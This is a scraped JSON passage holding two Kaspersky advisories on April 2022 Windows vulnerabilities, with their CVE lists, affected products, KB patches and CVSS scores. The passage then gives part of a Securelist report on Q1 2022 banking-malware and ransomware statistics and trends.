\n[CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>) \n[CVE-2022-26919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26919>) \n[CVE-2022-24493](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24493>) \n[CVE-2022-26798](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26798>) \n[CVE-2022-26807](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26807>) \n[CVE-2022-24530](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24530>) \n[CVE-2022-26787](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26787>) \n[CVE-2022-26797](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26797>) \n[CVE-2022-24481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24481>) \n[CVE-2022-24474](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24474>) \n[CVE-2022-26827](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26827>) \n[CVE-2022-24544](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24544>) \n[CVE-2022-24540](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24540>) \n[CVE-2022-26790](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26790>) \n[CVE-2022-26794](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26794>) \n[CVE-2022-26820](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26820>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5012658](<http://support.microsoft.com/kb/5012658>) \n[5012626](<http://support.microsoft.com/kb/5012626>) \n[5012632](<http://support.microsoft.com/kb/5012632>) \n[5012649](<http://support.microsoft.com/kb/5012649>) \n[5013999](<http://support.microsoft.com/kb/5013999>) \n[5014012](<http://support.microsoft.com/kb/5014012>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "kaspersky", "title": "KLA12509 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21983", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24485", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26815", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2022-06-15T00:00:00", "id": "KLA12509", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12509/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:50:31", "description": "### *Detect date*:\n04/12/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, cause denial of service, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2016 \nWindows RT 8.1 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2022 (Server Core installation) \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2019 \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 11 for x64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows Server 2022 \nWindows 11 for ARM64-based Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows 10 Version 21H2 for 32-bit Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 21H2 for x64-based Systems \nWindows Server 2012 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Upgrade Assistant \nHEVC Video Extension \nHEVC Video Extensions\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-26917](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26917>) \n[CVE-2022-26803](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26803>) \n[CVE-2022-26788](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26788>) \n[CVE-2022-26791](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26791>) \n[CVE-2022-26789](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26789>) \n[CVE-2022-26825](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26825>) \n[CVE-2022-26822](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26822>) \n[CVE-2022-26802](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26802>) \n[CVE-2022-26795](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26795>) \n[CVE-2022-26920](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26920>) \n[CVE-2022-26813](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26813>) \n[CVE-2022-26801](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26801>) \n[CVE-2022-26796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26796>) \n[CVE-2022-26916](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26916>) \n[CVE-2022-26812](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26812>) \n[CVE-2022-26793](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26793>) \n[CVE-2022-26821](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26821>) \n[CVE-2022-24549](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24549>) \n[CVE-2022-26915](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26915>) \n[CVE-2022-26831](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26831>) \n[CVE-2022-26828](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26828>) \n[CVE-2022-26810](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26810>) \n[CVE-2022-26792](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26792>) \n[CVE-2022-26786](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26786>) \n[CVE-2022-26918](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26918>) \n[CVE-2022-26904](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904>) \n[CVE-2022-26819](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26819>) \n[CVE-2022-26826](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26826>) \n[CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>) \n[CVE-2022-26919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26919>) \n[CVE-2022-26808](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26808>) \n[CVE-2022-26798](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26798>) \n[CVE-2022-26807](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26807>) \n[CVE-2022-26824](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26824>) \n[CVE-2022-26787](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26787>) \n[CVE-2022-26797](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26797>) \n[CVE-2022-26827](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26827>) \n[CVE-2022-26823](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26823>) \n[CVE-2022-26790](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26790>) \n[CVE-2022-26794](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26794>) \n[CVE-2022-26811](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26811>) \n[CVE-2022-26820](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26820>) \n[CVE-2022-24479](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24479>) \n[CVE-2022-23257](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23257>) \n[CVE-2022-26784](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26784>) \n[CVE-2022-24539](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24539>) \n[CVE-2022-24485](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24485>) \n[CVE-2022-24489](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24489>) \n[CVE-2022-24498](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24498>) \n[CVE-2022-24536](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24536>) \n[CVE-2022-24533](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24533>) \n[CVE-2022-26903](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26903>) \n[CVE-2022-24538](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24538>) \n[CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>) \n[CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>) \n[CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>) \n[CVE-2022-24545](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24545>) \n[CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) \n[CVE-2022-23268](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23268>) \n[CVE-2022-26818](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26818>) \n[CVE-2022-24543](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24543>) \n[CVE-2022-21983](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21983>) \n[CVE-2022-24537](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24537>) \n[CVE-2022-26829](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26829>) \n[CVE-2022-22008](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22008>) \n[CVE-2022-24534](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24534>) \n[CVE-2022-24499](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24499>) \n[CVE-2022-24542](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24542>) \n[CVE-2022-24528](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24528>) \n[CVE-2022-24487](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24487>) \n[CVE-2022-26830](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26830>) \n[CVE-2022-24490](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24490>) \n[CVE-2022-24488](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24488>) \n[CVE-2022-26815](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26815>) \n[CVE-2022-24494](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24494>) \n[CVE-2022-24483](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24483>) \n[CVE-2022-24484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24484>) \n[CVE-2022-26814](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26814>) \n[CVE-2022-24532](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24532>) \n[CVE-2022-24492](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24492>) \n[CVE-2022-22009](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22009>) \n[CVE-2022-24493](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24493>) \n[CVE-2022-24496](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24496>) \n[CVE-2022-26785](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26785>) \n[CVE-2022-26783](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26783>) \n[CVE-2022-24530](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24530>) \n[CVE-2022-26817](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26817>) \n[CVE-2022-24481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24481>) \n[CVE-2022-24474](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24474>) \n[CVE-2022-24546](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24546>) \n[CVE-2022-24486](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24486>) \n[CVE-2022-24547](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24547>) \n[CVE-2022-24544](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24544>) \n[CVE-2022-24540](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24540>) \n[CVE-2022-24495](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24495>) \n[CVE-2022-26816](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26816>) \n[CVE-2022-26914](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26914>) \n[CVE-2022-24550](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24550>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5012653](<http://support.microsoft.com/kb/5012653>) \n[5012647](<http://support.microsoft.com/kb/5012647>) \n[5012599](<http://support.microsoft.com/kb/5012599>) \n[5012596](<http://support.microsoft.com/kb/5012596>) \n[5012666](<http://support.microsoft.com/kb/5012666>) \n[5012639](<http://support.microsoft.com/kb/5012639>) \n[5012592](<http://support.microsoft.com/kb/5012592>) \n[5012604](<http://support.microsoft.com/kb/5012604>) \n[5012591](<http://support.microsoft.com/kb/5012591>) \n[5012650](<http://support.microsoft.com/kb/5012650>) \n[5012670](<http://support.microsoft.com/kb/5012670>) \n[5023706](<http://support.microsoft.com/kb/5023706>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "kaspersky", "title": "KLA12502 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-23268", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24532", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24543", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26791", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26829", "CVE-2022-26830", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2023-03-20T00:00:00", "id": "KLA12502", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12502/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2022-05-30T13:56:48", "description": "\n\n * [IT threat evolution in Q1 2022](<https://securelist.com/it-threat-evolution-q1-2022/106513/>)\n * **IT threat evolution in Q1 2022. Non-mobile statistics**\n * [IT threat evolution in Q1 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q1-2022-mobile-statistics/106589/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2022:\n\n * Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe.\n * Web Anti-Virus recognized 313,164,030 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 107,848 unique users.\n * Ransomware attacks were defeated on the computers of 74,694 unique users.\n * Our File Anti-Virus detected 58,989,058 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2022 Kaspersky solutions blocked the launch of at least one piece of malware designed to steal money from bank accounts on the computers of 107,848 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231205/01-en-malware-report-q1-2022-pc.png>))_\n\n#### Geography of financial malware attacks\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country and territory we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._\n\n_Geography of financial malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231231/02-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.5 \n2 | Afghanistan | 4.0 \n3 | Tajikistan | 3.9 \n4 | Yemen | 2.8 \n5 | Uzbekistan | 2.4 \n6 | China | 2.2 \n7 | Azerbaijan | 2.0 \n8 | Mauritania | 2.0 \n9 | Sudan | 1.8 \n10 | Syria | 1.8 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n#### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 36.5 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 16.7 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 6.7 \n4 | SpyEye | Trojan-Spy.Win32.SpyEye | 6.3 \n5 | Gozi | Trojan-Banker.Win32.Gozi | 5.2 \n6 | Cridex/Dridex | Trojan-Banker.Win32.Cridex | 3.5 \n7 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 3.3 \n8 | RTM | Trojan-Banker.Win32.RTM | 2.7 \n9 | BitStealer | Trojan-Banker.Win32.BitStealer | 2.2 \n10 | Danabot | Trojan-Banker.Win32.Danabot | 1.8 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\nOur TOP 10 leader changed in Q1: the familiar ZeuS/Zbot (16.7%) dropped to second place and Ramnit/Nimnul (36.5%) took the lead. The TOP 3 was rounded out by CliptoShuffler (6.7%).\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Law enforcement successes\n\n * Several members of the REvil ransomware crime group were [arrested](<https://tass.com/society/1388613>) by Russian law enforcement in January. The Russian Federal Security Service (FSB) [says](<http://www.fsb.ru/fsb/press/message/single.htm!id=10439388%40fsbMessage.html>) it seized the following assets from the cybercriminals: "more than 426 million rubles ($5.6 million) including denominated in cryptocurrency; $600,000; 500,000 euros; computer equipment, the crypto wallets that were used to perpetrate crimes, and 20 luxury cars that were purchased with illicitly obtained money."\n * In February, a Canadian citizen was [sentenced](<https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/>) to 6 years and 8 months in prison for involvement in NetWalker ransomware attacks (also known as Mailto ransomware).\n * In January, Ukrainian police [arrested](<https://www.bleepingcomputer.com/news/security/ukranian-police-arrests-ransomware-gang-that-hit-over-50-firms/>) a ransomware gang who delivered an unclarified strain of malware via e-mail. According to the statement released by the police, over fifty companies in the United States and Europe were attacked by the cybercriminals.\n\n#### HermeticWiper, HermeticRansom and RUransom, etc.\n\nIn February, new malware was discovered which carried out attacks with the aim of destroying files. Two pieces of malware \u2014 a Trojan called HermeticWiper that destroys data and a cryptor called [HermeticRansom](<https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/>) \u2014 were both [used](<https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/>) in cyberattacks in Ukraine. That February, Ukrainian systems were attacked by another Trojan called IsaacWiper, followed by a third Trojan in March called CaddyWiper. The apparent aim of this malware family was to render infected computers unusable leaving no possibility of recovering files.\n\nAn intelligence team later discovered that HermeticRansom only superficially encrypts files, and ones encrypted by the ransomware [can be decrypted](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>).\n\nRUransom malware was discovered in March, which was created to encrypt files on computers in Russia. The analysis of the malicious code revealed it was developed to wipe data, as RUransom generates keys for all the victim's encrypted files without storing them anywhere.\n\n#### Conti source-code leak\n\nThe ransomware group Conti had its source code leaked along with its chat logs which were made public. It happened shortly after the Conti group [expressed](<https://www.theverge.com/2022/2/28/22955246/conti-ransomware-russia-ukraine-chat-logs-leaked>) support for the Russian government's actions on its website. The true identity of the individual who leaked the data is currently unknown. According to different versions, it could have been a researcher or an insider in the group who disagrees with its position.\n\nWhoever it may have been, the leaked ransomware source codes in the public domain will obviously be at the fingertips of other cybercriminals, which is what happened on more than one occasion with examples like [Hidden Tear](<https://securelist.com/hidden-tear-and-its-spin-offs/73565/>) and Babuk.\n\n#### Attacks on NAS devices\n\nNetwork-attached storage (NAS) devices continue to be targeted by ransomware attacks. A new [wave of Qlocker Trojan infections](<https://www.bleepingcomputer.com/news/security/qlocker-ransomware-returns-to-target-qnap-nas-devices-worldwide/>) on QNAP NAS devices occurred in January following a brief lull which lasted a few months. A new form of ransomware infecting QNAP NAS devices also appeared in the month of January called [DeadBolt](<https://www.bleepingcomputer.com/news/security/qnap-warns-of-new-deadbolt-ransomware-encrypting-nas-devices/>), and [ASUSTOR](<https://www.bleepingcomputer.com/news/security/deadbolt-ransomware-now-targets-asustor-devices-asks-50-btc-for-master-key/>) devices became its new target in February.\n\n#### Maze Decryptor\n\nMaster decryption keys for Maze, Sekhmet and Egregor ransomware were made public in February. The keys turned out to be authentic and we increased our support to decrypt files encrypted by these [infamous](<https://securelist.com/maze-ransomware/99137/>) forms of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) in our RakhniDecryptor utility. The decryptor is available on the website of our [No Ransom](<https://noransom.kaspersky.com/>) project and the website of the international NoMoreRansom project in the [Decryption Tools](<https://www.nomoreransom.org/en/decryption-tools.html>) section.\n\n### Number of new modifications\n\nIn Q1 2022, we detected eight new ransomware families and 3083 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2021 \u2014 Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231301/03-en-ru-es-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2022, Kaspersky products and technologies protected 74,694 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231325/04-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of attacked users\n\n_Geography of attacks by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231349/05-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.08 \n2 | Yemen | 1.52 \n3 | Mozambique | 0.82 \n4 | China | 0.49 \n5 | Pakistan | 0.43 \n6 | Angola | 0.40 \n7 | Iraq | 0.40 \n8 | Egypt | 0.40 \n9 | Algeria | 0.36 \n10 | Myanmar | 0.35 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 24.38 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 13.71 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.35 \n4 | (generic verdict) | Trojan-Ransom.Win32.Phny | 7.89 \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.66 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.07 \n7 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 3.72 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 3.37 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 3.17 \n10 | (generic verdict) | Trojan-Ransom.Win32.Agent | 1.99 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was 